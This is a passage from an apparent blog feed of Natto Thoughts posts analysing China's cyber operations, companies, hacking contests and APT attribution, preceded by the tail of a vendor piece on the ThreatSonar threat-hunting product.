intelligence:</p> <p><strong>1. Specialized APT Detection</strong>: A built-in YARA rule base integrating thousands of APT backdoor signatures, plus the ability to import external indicators of compromise (IoCs) and STIX-format intelligence, effectively uncovers latent threats that bypass Endpoint Detection and Response (EDR).</p> <p><strong>2. Lightweight Deployment</strong>: Supports Windows, Linux, macOS, and other operating systems. The executable is approximately 5MB to download and can be deployed immediately, with no driver installation or system configuration changes, which facilitates rapid, large-scale rollout and quickly enhances enterprise defense capabilities.</p> <p><strong>3. Comprehensive Visualization and Threat Classification</strong>: Performs horizontal analysis across files, memory, network connections, and event logs. Threat risk is presented on levels 0–5, helping administrators prioritize their responses.</p> <p><strong>4. Memory identification and behavior tracing</strong>: ThreatSonar can analyze memory and the attacker's path, and through timeline tracing uncover the root cause of the attack and fully reconstruct the attack process.</p> <h2>Real-world Case Studies: ThreatSonar's Immediate Effectiveness</h2> <p>ThreatSonar demonstrates significant benefits in real-world scenarios:</p> <ul> <li><p><strong>Case Study 1: Comprehensive Health Check for a Large Enterprise</strong><br/> A major company implemented ThreatSonar to conduct a comprehensive scan of 10,000 endpoints. Within two weeks, it discovered APT attack samples disguised as files and 2,268 malicious files (related to Ruby). Through automated analysis and threat risk classification, the company was able to quickly identify the attack path and establish a long-term, periodic assessment mechanism.</p> </li> <li><p><strong>Case Study 2: Rapid Response to Global Cybersecurity Incidents in the Manufacturing Industry</strong><br/> A manufacturing group with 50,000 employees accelerated its global incident response process with ThreatSonar. Before implementation, the analysis process took 200 hours; afterwards, it took only 40 hours. A preliminary forensic report was completed within a few days, and decision-making at overseas locations was accelerated more than fivefold, significantly improving overall response efficiency.</p> </li> </ul> <h2>Conclusion: The Intelligence-Driven Future of Cybersecurity</h2> <p>ThreatSonar transforms threat defense from a passive "defense" approach to a proactive "diagnosis" approach. It not only helps enterprises shorten the time from "discovery" to "response" (mean time to detect, MTTD, and mean time to recover, MTTR), but also, by establishing baseline monitoring models and conducting regular checks, ensures accurate responses in both "daily operations" and "incident response" scenarios.</p> <p>In an era of limited resources and unlimited threats, the TeamT5 solution embodies an "intelligence-driven" cybersecurity mindset: based on threat intelligence and centered on insight, it enables rapid and effective proactive threat defense.</p>
  19. Wargaming a China-Taiwan Conflict and Its Cyber Scenarios

    Wed, 25 Mar 2026 14:03:25 -0000

    China&#8217;s use of cyber strategies in a conflict with Taiwan is likely to follow a methodical, gradual approach
    <p><em>This post is co-authored by the Natto Team and Robin Dimyanoglu from <a href="https://blog.predictivedefense.io/">Predictive Defense</a>.</em></p><div><hr></div><p>Since the start of President Trump’s second term in January 2025, the Trump administration has <a href="https://www.axios.com/2026/03/02/trump-iran-war-military-strikes-maga">conducted</a> military actions or strikes in seven countries. The ouster of Venezuelan president Nicolas Maduro in January 2026 and the ongoing US-Israeli joint military operation against Iran make it feel as if the threshold for war has been lowered. Leaders across the globe are likely drawing their own conclusions. Bill Bishop, a China expert at Sinocism, <a href="https://substack.com/@sinocism/note/c-221158202?utm_source=notes-share-action&amp;r=1fj33r">remarked</a>, “Maduro and now Ayatollah Ali Khamenei in two months. Would love to know what Xi really thinks about this,” referring to Chinese President Xi Jinping. Indeed, what does Xi think about these developments? In particular, how do they shape Xi’s views on Taiwan “reunification”? Have US military actions in seven countries influenced Xi’s perspective on using military force to achieve China’s goal of “reunification”—which he <a href="https://www.nattothoughts.com/i/141051336/what-are-xis-thoughts-on-taiwan-reunification-and-the-use-of-force-over-taiwan">considers</a> a “historical inevitability”?</p><p>A potential conflict between China and Taiwan would represent a globally significant inflection point. Drawing from the Center for Strategic and International Studies (CSIS) 2023 <a href="https://www.csis.org/analysis/first-battle-next-war-wargaming-chinese-invasion-taiwan">report</a> <strong>The First Battle of the Next War: Wargaming a Chinese Invasion of Taiwan</strong>, this piece conducts a reality check on the likely China-Taiwan conflict scenario presented in the CSIS report, and examines the challenges and possible cyber implications of such a scenario and how organizations across sectors could be exposed, whether directly or indirectly.</p><p>Based on war games involving a simulated invasion, the CSIS study provides insights under clearly defined assumptions, including the participating actors and their roles, mobilization timelines, ammunition availability, and the types of operations conducted. While no single study can predict outcomes, its transparent methodology and multi-scenario approach provide a useful analytical foundation.</p><figure><figcaption class="image-caption">Credit: Wikimedia Commons</figcaption></figure> <p> <a href="https://www.nattothoughts.com/p/wargaming-a-china-taiwan-conflict"> Read more </a> </p>
  20. Faux Amis: How France Stands Apart in Europe’s High-Risk University Cyber Partnerships with China

    Wed, 11 Mar 2026 14:02:23 -0000

    France hosts the EU&#8217;s densest cluster of cyber partnerships with Chinese defense-linked universities, raising exposure to dual-use knowledge transfer, EU funding access, and institutional influence
    <p>In September 2025, Intelligence Online <a href="https://www.intelligenceonline.com/asia-pacific/2025/09/16/french-engineering-schools-call-off-partnership-with-chinese-military-linked-beihang-university,110522377-art">reported</a> that France’s National Institute of Applied Sciences (Institut National des Sciences Appliquées, INSA) network of engineering schools had cancelled plans to establish a joint institute in Beijing with Beihang University (北京航空航天大学). The project had received initial clearance from the relevant French ministries. Yet internal opposition within several INSA boards ultimately led to its cancellation just weeks before launch. According to the report, concerns centered on academic freedom and “the nature” of Beihang itself, which has been identified by a range of <a href="https://www.justice.gov/usao-ndca/pr/justice-department-declines-prosecution-company-self-disclosed-export-control-offenses">governments</a>, <a href="https://sciencebusiness.net/news/Horizon-Europe/read-details-five-eu-research-projects-involving-chinas-military-linked-universities?utm_source=chatgpt.com">research bodies</a>, and <a href="https://unitracker.aspi.org.au/universities/beihang-university?utm_source=chatgpt.com">policy institutions</a> as closely integrated into China’s defense research system and linked to the People’s Liberation Army.</p><p>The episode reflects growing awareness in parts of the European Union (EU) about the strategic implications of university partnerships with Chinese institutions embedded in the country’s defense research system. However, it remains an isolated institutional reversal, with similar collaborations persisting in a number of countries. In December 2025, Beihang itself <a href="https://ev.buaa.edu.cn/info/1022/2880.htm">claimed</a> to have “elevated European cooperation to new heights.”</p><p>Over the past decade, university cooperation between some EU member states and China has expanded rapidly across several fields. Many of these exchanges generate legitimate academic and economic benefits. However, some partner institutions are not simply civilian universities.<sup>1</sup> They are formally authorized to conduct classified weapons equipment research and are structurally embedded in China’s military and defense industrial system, raising concerns about dual-use knowledge transfer (research with both civilian and military applications), access to EU funding streams, and long-term institutional exposure and influence aligned with defense research agendas.<sup>2</sup></p><p>Cyber-related disciplines are particularly sensitive. Fields such as software engineering, telecommunications, computer science, and information security cultivate inherently dual-use skills. These capabilities support civilian digital infrastructure and defensive cybersecurity, but also enable cyber espionage (including intellectual property theft), offensive cyber operations, and applications such as secure military communications and strategic command systems. Such capabilities can be deployed remotely in both peacetime and conflict.</p><p>Within this landscape, France stands out. Among EU member states, it has the highest concentration of cyber partnerships involving Chinese institutions that hold state secrecy clearance or maintain formal ties to China’s defense establishment. This piece maps EU–China cyber-related joint degree partnerships, identifies institutional risk factors including security clearance status and defense affiliation, and examines the French case in depth. Beihang University’s School of Cyber Science and Technology serves as a central case study, including analysis of its state and defense industry ties and a review of the research activities and affiliations of nearly 80 faculty members.</p><p><strong>The Appendix identifies EU–China cyber-related partnerships and their disciplinary focus, highlights relevant risk factors, and explains the methodology used to assess institutional affiliations and involvement in classified research.</strong></p> <p> <a href="https://www.nattothoughts.com/p/faux-amis-how-france-stands-apart"> Read more </a> </p>
  21. China’s National Research Center for Information Technology Security: Is It Part of the PLA Cyberspace Force?

    Wed, 25 Feb 2026 15:02:37 -0000

    Under a “Two signboards” arrangement, the NITSC offers services to public, Party, government, and military entities under the guise of a civilian name.
    <p>Over the years, the Natto Team has published a substantial amount of <a href="https://www.nattothoughts.com/p/flax-typhoon-linked-company-integrity">research</a> on the role of China’s private sector in building the country’s cyber capabilities. The private sector, particularly the cybersecurity industry, has become an indispensable resource for the Chinese government in conducting advanced technological cybersecurity research, supporting offensive cyber operations, and defending the country’s critical infrastructure. However, we recognize that no matter how important the private sector’s role is, the government and military must have their own affiliated entities to conduct cybersecurity research and development, respond to cyber incidents, protect critical infrastructure, perform security testing and product evaluation, and carry out cyber operations. Glimpses of their activity come to light, such as the 2020 US <a href="https://www.justice.gov/archives/opa/pr/chinese-military-personnel-charged-computer-fraud-economic-espionage-and-wire-fraud-hacking">indictment</a> of members of the PLA 54th Research Institute for the “brazen criminal heist” of information from US credit reporting agency Equifax.<sup>1</sup> What more can we learn about entities directly affiliated with government agencies like the Ministry of State Security (MSS) or the People’s Liberation Army (PLA)? What capabilities do they possess that contribute to China’s emergence as a “<a href="https://www.bloomsburycollections.com/monograph-detail?docid=b-9798881817602&amp;pdfid=9798881817602.ch-8.pdf&amp;tocid=b-9798881817602-chapter8#b-9798881817602-0002782">Cyber Superpower</a>”?</p><figure><figcaption class="image-caption">NITSC website banner. Source: NITSC</figcaption></figure><p>In this post, the Natto Team explores an example of a Chinese government- and military-affiliated entity: the <strong>National Research Center for Information Technology Security (NITSC)</strong> (国家信息技术安全研究中心). We examine its organizational structure, affiliations, and capabilities, then reveal its military connections. Lastly, we present questions for further research.</p> <p> <a href="https://www.nattothoughts.com/p/chinas-national-research-center-for"> Read more </a> </p>
  22. The Tianfu Cup Returns Under MPS Leadership as AI Takes Center Stage

    Wed, 11 Feb 2026 14:02:47 -0000

    After a two-year hiatus, the Tianfu Cup returns under MPS lead, combining AI-assisted vulnerability discovery and exploitation, a new competition track, and less transparency in vulnerability handling
    <p>The Tianfu Cup (&#22825;&#24220;&#26479;), China&#8217;s premier exploit hacking competition,<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> has returned to Chengdu, Sichuan Province, for its sixth edition, held from January 29 to 30, 2026, this time under the organizational lead of China&#8217;s Ministry of Public Security (MPS), China&#8217;s domestic law-enforcement authority. Launched in 2018 after Chinese authorities <a href="https://www.atlanticcouncil.org/in-depth-research-reports/report/capture-the-red-flag-an-inside-look-into-chinas-hacking-contest-ecosystem/">barred</a> domestic researchers from participating in international exploit competitions, such as Canada&#8217;s Pwn2Own, the Tianfu Cup emerged as a domestic alternative for high-end vulnerability research and exploitation.</p><div class="captioned-image-container"><figure><img src="https://substackcdn.com/image/fetch/$s_!5R9h!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png" width="1280" height="555" alt=""><figcaption class="image-caption">2026 Tianfu Cup homepage. Screenshot by the Natto Team, taken on January 31, 2026, of the Tianfu Cup 2026 website.</figcaption></figure></div><p>After skipping three editions in 2022, 2024, and 2025, the competition has now reappeared, although the reasons for this hiatus and revival remain unclear. 
The event was <a href="https://archive.ph/gwwpl">first announced </a>on China&#8217;s MPS website on January 16. On January 19, the Tianfu Cup&#8217;s account on the social media platform X appears to have briefly posted about the competition before deleting the post shortly thereafter. The following day, the event&#8217;s website (hxxps://tianfucup[.]cn) became inaccessible from outside China. By February 2, following the conclusion of the contest, the site appeared to have been taken offline entirely and remains inaccessible as of this writing. The Natto Team was nonetheless able to access the website for this piece, which includes screenshots of relevant information, as well as MPS and private company press releases that remain accessible.</p><p>Building on earlier analyses of past Tianfu Cup events by the <a href="https://www.nattothoughts.com/p/tianfu-cup-2023-still-a-thing">Natto Team</a> and the <a href="https://css.ethz.ch/en/center/CSS-news/2024/06/from-vegas-to-chengdu-hacking-contests-bug-bounties-and-chinas-offensive-cyber-ecosystem.html">From Vegas to Chengdu report </a>from the Center for Security Studies at ETH Zurich, this piece examines what has changed with the Tianfu Cup&#8217;s return and why it matters. It analyzes the shift from a commercially led competition to one organized almost entirely by the MPS, specifically the Sichuan Provincial Public Security Bureau. It then looks at the structure of the 2026 edition and its two tracks, including evidence of AI-assisted techniques being used in vulnerability discovery and exploitation. 
Finally, it explores what remains the most consequential and unresolved question: where vulnerabilities discovered at the Tianfu Cup are likely to end up, and what this suggests about China&#8217;s evolving approach to vulnerability retention and state control.</p><p><strong>A complete list of competition targets, as disclosed on the 2026 Tianfu Cup website, is reproduced in the appendix at the end of this piece.</strong></p> <p> <a href="https://www.nattothoughts.com/p/the-tianfu-cup-returns-under-mps"> Read more </a> </p>
  23. Provincial Tasking, Cross-Provincial Execution: A Case-Based Look at How China Scales Cyber Operations

    Wed, 28 Jan 2026 15:02:08 -0000

    How decentralized MSS and MPS tasking and market-enabled, cross-provincial execution by commercial firms shape the scale of China&#8217;s cyber operations
    <p>In a previous piece, we<a href="https://nattothoughts.substack.com/p/the-many-arms-of-the-mss-why-provincial"> argued</a> that provincial Ministry of State Security (MSS) bureaus function as key organizational nodes in China&#8217;s cyber operations &#8211; acting as operational nerve centers with their own internal priorities, resources, and institutional logics.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> But this decentralization does not mean that cyber operations are siloed at the provincial level.</p><p>Disclosures from a 2024 leak, together with a March 2025 U.S. indictment involving Anxun (<a href="https://www.nattothoughts.com/p/i-soon-another-company-in-the-apt41">i-SOON</a>) Information Technology Co., Ltd (&#23433;&#27957;&#20449;&#24687;&#25216;&#26415;&#26377;&#38480;&#20844;&#21496;), which has been linked to Chinese state-sponsored cyber campaigns, <a href="https://www.justice.gov/opa/pr/justice-department-charges-12-chinese-contract-hackers-and-law-enforcement-officers-global">indicate</a> that a single commercial actor can be tasked by, actively seek contract opportunities from, or perform work for, a large number of provincial MSS and Ministry of Public Security (MPS) bureaus. This case provides rare visibility into how a single firm can support multiple, distinct provincial mandates and supply the operational capacity through which intrusions are carried out at near-national scale.</p><p>Building on this, this piece examines how companies allegedly linked to APT activity &#8211; concentrated in a small number of provinces &#8211; enable cross-provincial operational scaling, even as provincial bureaus remain the primary source of tasking and authority. 
It begins by briefly distinguishing legitimate businesses from front companies, then traces how earlier cyber operations were likely predominantly organized around provincially bounded, bureau-executed models centered on front companies.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-2" href="#footnote-2" target="_self">2</a> Next, it shows how market maturity enabled greater collaboration between government agencies and legitimate firms, and concludes by examining why these firms are concentrated in a handful of provinces.</p> <p> <a href="https://www.nattothoughts.com/p/provincial-tasking-cross-provincial"> Read more </a> </p>
  24. China’s 2025 Top 20 Cybersecurity Companies: Which “Dark Horses” Will Emerge to Prominence in 2026?

    Wed, 14 Jan 2026 15:03:15 -0000

    Annual ranking reveals hyper-competitive, innovation-focused top performers &#8211; some familiar and some not so well known, with extensive government ties
    <p>As we enter 2026, the geopolitical landscape appears more uncertain than ever. Ongoing conflicts, such as the Russia-Ukraine war, remain unresolved, while <a href="https://www.aei.org/articles/bracing-for-china-shock-2-0/">competition</a> among major world powers is intensifying. In such a climate, strength and capability are paramount. China&#8217;s cybersecurity industry <a href="https://web.archive.org/web/20251007173305/https:/www.ciids.cn/list_15/5033.html">recognizes</a> its special expertise as &#8220;the fundamental cornerstone for safeguarding national security.&#8221; Among the more than five thousand cybersecurity companies in China, which ones stand out as top providers of quality products and services, significantly contributing to China&#8217;s national security? The &#8220;2025 Top 20 Chinese Cybersecurity Enterprises (2025&#24180;&#20013;&#22269;&#32593;&#32476;&#23433;&#20840;&#21069;&#20108;&#21313;&#23478;&#20225;&#19994;)&#8221; list featured in the annual &#8220;China Internet Company Comprehensive Capability Index (CICCI) (&#20013;&#22269;&#20114;&#32852;&#32593;&#20225;&#19994;&#32508;&#21512;&#23454;&#21147;&#25351;&#25968;)&#8221; <a href="https://web.archive.org/web/20260108023343/https:/www.isc.org.cn/article/27470949623525376.html">report</a> published at the end of December 2025 by the <a href="https://web.archive.org/web/20250211023130/https:/www.isc.org.cn/article/15315.html">Internet Society of China</a> (ISC)&#8212;an industry association affiliated with the Chinese Ministry of Industry and Information Technology (MIIT)&#8212;offers a fresh perspective on the leading players in China&#8217;s cybersecurity industry as we begin our 2026 research focused on this sector.</p><p>The Natto Team believes that understanding these Chinese cybersecurity companies is essential for grasping how China develops its cyber capabilities. 
Since launching Natto Thoughts in 2023, our team has investigated several Chinese cybersecurity companies involved in state-sponsored or state-linked cyber operations. Our <a href="https://nattothoughts.substack.com/p/a-look-back-at-the-top-5-natto-thoughts">findings</a> suggest that China has established a highly effective and state-aligned system, notably integrating the private sector&#8212;Chinese cybersecurity companies&#8212;in building its cyber capabilities.</p><p>In this post, the Natto Team examines the overall development of China&#8217;s cybersecurity sector and the top cybersecurity companies of 2025 based on the ISC&#8217;s CICCI reports, which analyze these companies&#8217; key performance indicators, innovation and research and development (R&amp;D) capabilities, business and market coverage, and how their core functions align with China&#8217;s national priorities.</p> <p> <a href="https://www.nattothoughts.com/p/chinas-2025-top-20-cybersecurity"> Read more </a> </p>
  25. A Look Back at the Top 5 Natto Thoughts Reports in 2025

    Tue, 06 Jan 2026 15:03:16 -0000

    From attack&#8211;defense thinking to vulnerability research and exposed threat actors, we explored key aspects of China&#8217;s cyber ecosystem
    <div class="captioned-image-container"><figure><img src="https://images.unsplash.com/photo-1633180888652-c561b86040f1?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wzMDAzMzh8MHwxfHNlYXJjaHw1M3x8d29yayUyMGhhcmR8ZW58MHx8fHwxNzY3NzE2MjMwfDA&amp;ixlib=rb-4.1.0&amp;q=80&amp;w=1080" width="4272" height="2848" alt="a pile of paper with a pen on top of it"><figcaption class="image-caption">Photo by <a href="https://unsplash.com/@jessica45">Jessica G.</a> on <a href="https://unsplash.com">Unsplash</a></figcaption></figure></div><p>Natto Thoughts had a great year in 2025, experiencing strong growth in both readership and collaboration. The Natto Team would like to thank our readers for making our in-depth explorations of China&#8217;s evolving cyber ecosystem our most-viewed reports of the year. Your support drives our research. 
We also want to thank Eugenio Benincasa and Dakota Cary for their research collaboration efforts. Three of the top five reports resulted from this partnership.</p><p>Collectively, these five reports provide a comprehensive overview of how China has formally institutionalized its cyber capabilities, resulting in a highly effective and state-aligned system&#8212;particularly highlighting the integrated role of the private sector.</p><p>Here are the highlights from the top 5 reports:</p><ul><li><p>&#8220;<strong><a href="https://nattothoughts.substack.com/p/defense-through-offense-mindset-from">Defense-Through-Offense Mindset: From a Taiwanese Hacker to the Engine of China&#8217;s Cybersecurity Industry</a></strong>&#8220;: This report demonstrated how the guiding philosophy, &#8220;To defend, one must first know how to attack&#8221; (&#20197;&#25915;&#20026;&#38450;), originated in 1990&#8230;</p></li></ul> <p> <a href="https://www.nattothoughts.com/p/a-look-back-at-the-top-5-natto-thoughts"> Read more </a> </p>
  26. The Many Arms of the MSS: Why Provincial Bureaus Matter in China’s Cyber Operations

    Tue, 16 Dec 2025 17:01:34 -0000

    Provincial bureaus of the Chinese Ministry of State Security likely operate with their own tasking priorities, resources, and local ecosystems for cyber operations
    <p>To defend systems, one must first pinpoint the source of malicious activity. 
Most cyber threat intelligence (CTI) firms focus on tactical and operational attribution: tactical attribution identifies and clusters technical details such as malware used, attack methods, or indicators of compromise, while operational attribution uses characteristics of activity clusters to infer group profiles and assigns labels like &#8220;APT&#8221; or &#8220;UNC.&#8221;<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> Strategic attribution goes further by identifying the real-world individuals or entities behind an intrusion.</p><p>Some CTI experts <a href="https://www.robertmlee.org/the-problems-with-seeking-and-avoiding-true-attribution-to-cyber-attacks/">debate</a> the conditions under which strategic attribution is appropriate, while others <a href="https://www.uclalawreview.org/wp-content/uploads/securepdfs/2020/09/Eichensehr-67-3.pdf">highlight</a> the technical challenges of identifying threat actors, the political motivations behind public disclosure, and the legal standards required to assign responsibility. The Natto Team and <a href="https://www.amazon.com/Attribution-Advanced-Persistent-Threats-cyber-espionage/dp/3662613123">other</a> researchers believe that &#8211; compared to &#8220;cluster-based&#8221; tactical and operational attribution &#8211; the strategic identification of real-world individuals and o&#8230;</p> <p> <a href="https://www.nattothoughts.com/p/the-many-arms-of-the-mss-why-provincial"> Read more </a> </p>
  27. Knownsec: The King of Vulnerability Missed Three Vulnerabilities of Its Own

    Wed, 03 Dec 2025 17:02:43 -0000

    The leak incident involving Chinese cybersecurity firm Knownsec shows the company&#8217;s seemingly transparent crisis management strategy and underscores its position in the industry, but mysteries remain.
    <p>On November 5, 2025, a Chinese-language blog called <a href="https://archive.li/NNsWb#selection-347.3-347.169">Mrxn&#8217;s Blog</a> published a &#8220;massive&#8221; leak of information from Knownsec (&#30693;&#36947;&#21019;&#23431;), a Chinese cybersecurity company. Mrxn claimed that the leak included 12,000 confidential documents, such as &#8220;China&#8217;s state-level cyber weapons, internal tool systems, and global target lists.&#8221; The blog provided sample screenshots of the leak and noted that the leaked information first appeared on the code-sharing platform GitHub, which subsequently removed it &#8220;for violating its terms of service.&#8221; The <a href="https://netaskari.substack.com/p/knownsec-breach-what-we-know-so-far">NETASKARI</a> Substack was among the first outlets to report in English on Mrxn&#8217;s blog post about the leak. <a href="https://netaskari.substack.com/p/knownsec-breach-what-we-know-so-far">NETASKARI</a>&#8217;s author, a freelance journalist based in Amsterdam, The Netherlands, provided a summary and analysis of the limited available leaked documents&#8212;including screenshots of product brochures, data collection lists, and a Knownsec company profile&#8212;and concluded there was no &#8220;smoking gun&#8221; or evidence of state-of-the-art tools used by Chinese state hackers. H&#8230;</p> <p> <a href="https://www.nattothoughts.com/p/knownsec-the-king-of-vulnerability"> Read more </a> </p>
  28. China’s Cybersecurity Companies Advancing Offensive Cyber Capabilities Through Attack-Defense Labs

    Wed, 19 Nov 2025 17:03:09 -0000

    Private-sector attack-defense labs form a core pillar of how China builds, sustains, and operationalizes cyber capability for commercial purposes and state-linked cyber operations.
    <p>Western governments are grappling with how private-sector offensive cyber capabilities should fit into state operations. This raises a number of practical <a href="https://www.govtech.com/blogs/lohrmann-on-cybersecurity/cyber-privateers-the-return-of-the-hack-back-debate">questions</a>: If a state tasked a company with carrying out cyber operations against an adversary, who inside those organizations would actually carry out offensive work?<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> How would these units be structured for government tasks? And how would offensive activity coexist with a company&#8217;s day-to-day R&amp;D and commercial operations?</p><p>In China, these questions are far less abstract. Private companies have been core contributors to national cyber capability building for years, supported by both policy and institutional design. They develop many of the tools, techniques, and forms of expertise that underpin defensive security products and can also be leveraged for state-sponsored cyber operations. The clearest organizational expression of this approach is companies&#8217; widespread use of <strong>attack-defense labs (&#25915;&#38450;&#23454;&#39564;&#23460;)</strong>, internal units that merge defensiv&#8230;</p> <p> <a href="https://www.nattothoughts.com/p/chinas-cybersecurity-companies-advancing"> Read more </a> </p>
  29. A Researcher Came Knocking, and Taught China a Lesson in How to Manage Vulnerabilities and Researchers

    Wed, 05 Nov 2025 17:02:57 -0000

    A TCL TV vulnerability disclosure drove home the message: to protect its economic and political clout, China must heed global vulnerability researchers' warnings and cultivate Chinese researchers
    <p>In the last few days of October 2025 in Asia, <a href="https://www.youtube.com/watch?v=6wU7nfqJ2SI">gift-giving</a> between top political leaders has drawn a lot of attention&#8212;and <a href="https://www.youtube.com/watch?v=1KdW6wjfTCY&amp;t=56s">laughter</a>. One moment, which surprised many of us, was when Chinese President Xi Jinping showed humor during his gift exchange with South Korean President Lee Jae Myung. It is rare to see a Chinese leader &#8220;<a href="https://www.nytimes.com/2025/11/02/world/asia/xi-jinping-china-south-korea-spying.html">speaking off the cuff in public</a>.&#8221; On this occasion, President Xi joked about backdoors in cellphones&#8212;yes, <a href="https://csrc.nist.gov/glossary/term/backdoor">backdoors</a> that can monitor or access the information in mobile devices.</p><p>During his first <a href="https://web.archive.org/web/20251104150038/https:/www.fmprc.gov.cn/eng/xw/zyxw/202511/t20251101_11745458.html">state visit</a> to South Korea after 11 years, Xi presented two Chinese-made Xiaomi brand smartphones&#8212;the world&#8217;s <a href="https://counterpointresearch.com/en/insights/global-smartphone-share">third-largest</a> smartphone brand&#8212;to South Korean President Lee Jae Myung. When Lee asked delightedly about the quality of communication and the security of the phone, Xi smiled and said, &#8220;You can check if there is a backdoor.&#8221;</p><p>President Xi is undoubtedly fully aware that the United States and its allies have warned that Chinese technology may contain <a href="https://selectcommitteeontheccp.house.gov/media/press-releases/gallagher-urges-us-navy-exchange-remove-ccp-linked-computers-stores">backdoors</a>&#8212;what the &#8230;</p> <p> <a href="https://www.nattothoughts.com/p/what-a-narrative-control-failure"> Read more </a> </p>
  30. Beyond the Aliases: Decoding Chinese Threat Group Attribution and the Human Factor

    Wed, 22 Oct 2025 16:02:27 -0000

    Examining the overlap between APT27, HAFNIUM, and Silk Typhoon through recent U.S. government disclosures, and why understanding the humans behind the keyboard is important for cyber defenders
    <p>Since March 2025, the U.S. government has exposed Chinese hackers and entities linked to threat groups publicly tracked as <strong>APT27</strong>, <strong>HAFNIUM</strong>, <strong>Silk Typhoon</strong>, and other threat group monikers. Among these named Advanced Persistent Threat (APT) groups, technical analysis and observed intrusion activities from the cybersecurity community have provided group tracking criteria and measures to mitigate harm and to eradicate malware from systems and networks. Because cybersecurity firms often use different threat models, have their own standards for clustering intrusions, and closely guard their <a href="https://www.proofpoint.com/us/threat-reference/telemetry">telemetry data</a>&#8212;often not sharing with others&#8212;we see threat groups labeled with a number of &#8220;a.k.a.&#8221; (also known as) group names. For example, the <a href="https://malpedia.caad.fkie.fraunhofer.de/actor/apt27">profile of APT27</a> on Malpedia, a community-curated online malware encyclopedia and resource, lists 16 a.k.a. group names. How do these a.k.a. groups overlap? How are they different from one another? The answers are not always clear.</p><p>Additionally, when law enforceme&#8230;</p> <p> <a href="https://www.nattothoughts.com/p/beyond-the-aliases-decoding-chinese"> Read more </a> </p>
  31. China’s Vulnerability Research: What’s Different Now?

    Wed, 08 Oct 2025 16:02:33 -0000

    China&#8217;s bug-hunting scene is maturing - more players, bigger prizes, tighter structure, and a growing focus on domestic products, driven by profit, prestige, and national security.
    <p>Over the past two decades, China&#8217;s vulnerability research ecosystem has undergone a dramatic transformation. <a href="https://nattothoughts.substack.com/p/no-ranges-no-bounties-no-contests">In the early 2000s</a>, it was a fragmented landscape of free databases and easily accessible, low-cost exploits. Over time, it evolved toward commercialization, with organized vulnerability markets and institutional research labs emerging within major tech and cybersecurity companies.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> By the mid-2010s, Chinese hackers were <a href="https://ethz.ch/content/dam/ethz/special-interest/gess/cis/center-for-securities-studies/pdfs/cyber-report-2024-from-vegas-to-chengdu.pdf">competing &#8211; and excelling &#8211;</a> in global exploit hacking contests<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-2" href="#footnote-2" target="_self">2</a> and bug bounty programs<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-3" href="#footnote-3" target="_self">3</a> to identify weak spots in Western products.</p><p>As this ecosystem has evolved, the Chinese state moved to harness the vulnerability research for national priorities through both formal and informal channels. From the <strong>top down</strong>, it imposed institutional mechanisms such as direct oversight of researchers and regulations that mandate or incentivize reporting to state-run entities. From the<strong> bottom up</strong>, informal networks among prominent researchers, who exchange insights and acquisition o&#8230;</p> <p> <a href="https://www.nattothoughts.com/p/chinas-vulnerability-research-whats"> Read more </a> </p>
  32. Who is Salt Typhoon Really? Unraveling the Attribution Challenge

    Wed, 24 Sep 2025 16:08:09 -0000

    How overlapping APT groups and Chinese companies complicate attribution in state cyber operations
    <p>Our <a href="https://nattothoughts.substack.com/p/salt-typhoon-new-joint-advisory-offers">previous post</a> about Salt Typhoon provided an initial commentary on the <a href="https://media.defense.gov/2025/Aug/22/2003786665/-1/-1/0/CSA_COUNTERING_CHINA_STATE_ACTORS_COMPROMISE_OF_NETWORKS.PDF">Joint Cybersecurity Advisory</a> on Salt Typhoon issued on August 27, 2025. The advisory identified three Chinese companies - <strong><a href="https://nattothoughts.substack.com/i/155370638/sichuan-juxinhes-area-of-focus-communication-system-services-aligns-with-salt-typhoon-targeting">Sichuan Juxinhe Network Technology Co. Ltd.</a></strong> (四川聚信和网络科技有限公司), <strong><a href="https://nattothoughts.substack.com/i/173242203/beijing-huanyu-tianqiong-as-a-front-company-changing-business-scopes-to-meet-client-needs">Beijing Huanyu Tianqiong Information Technology Co., Ltd.</a></strong> (北京寰宇天穹信息技术有限公司), and <strong><a href="https://nattothoughts.substack.com/i/173242203/sichuan-zhixin-ruijie-as-a-real-business-lacking-a-company-webpage-but-engaged-in-dedicated-contract-work">Sichuan Zhixin Ruijie Network Technology Co., Ltd.</a></strong> (四川智信锐捷网络科技有限公司) - as suppliers of products and services to Salt Typhoon and other overlapping groups such as OPERATOR PANDA, RedMike, UNC5807, and GhostEmperor. After examining these three Chinese companies and their possible roles in Salt Typhoon-related cyber operations, we presented a few questions worth further exploration. In this post, we will address questions about the involvement of Chinese companies in state-sponsored cyber operations and share some observations on threat attribution from the joint advisory.</p><figure><img src="https://substackcdn.com/image/fetch/$s_!gpjA!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png" width="645" height="469" alt=""></figure><h1>First, an update: The Company Webpage of Sichuan Zhixin Ruijie is Found</h1><p>Previously, the…</p> <p> <a href="https://www.nattothoughts.com/p/who-is-salt-typhoon-really-unraveling"> Read more </a> </p>
  33. Salt Typhoon: New Joint Advisory Offers a Beacon Through the Storm but Stirs Up New Questions

    Wed, 10 Sep 2025 16:03:20 -0000

    Analysis of newly identified Salt Typhoon-linked companies casts light on the complex ecosystem of front companies and real businesses supporting Chinese state cyber operations
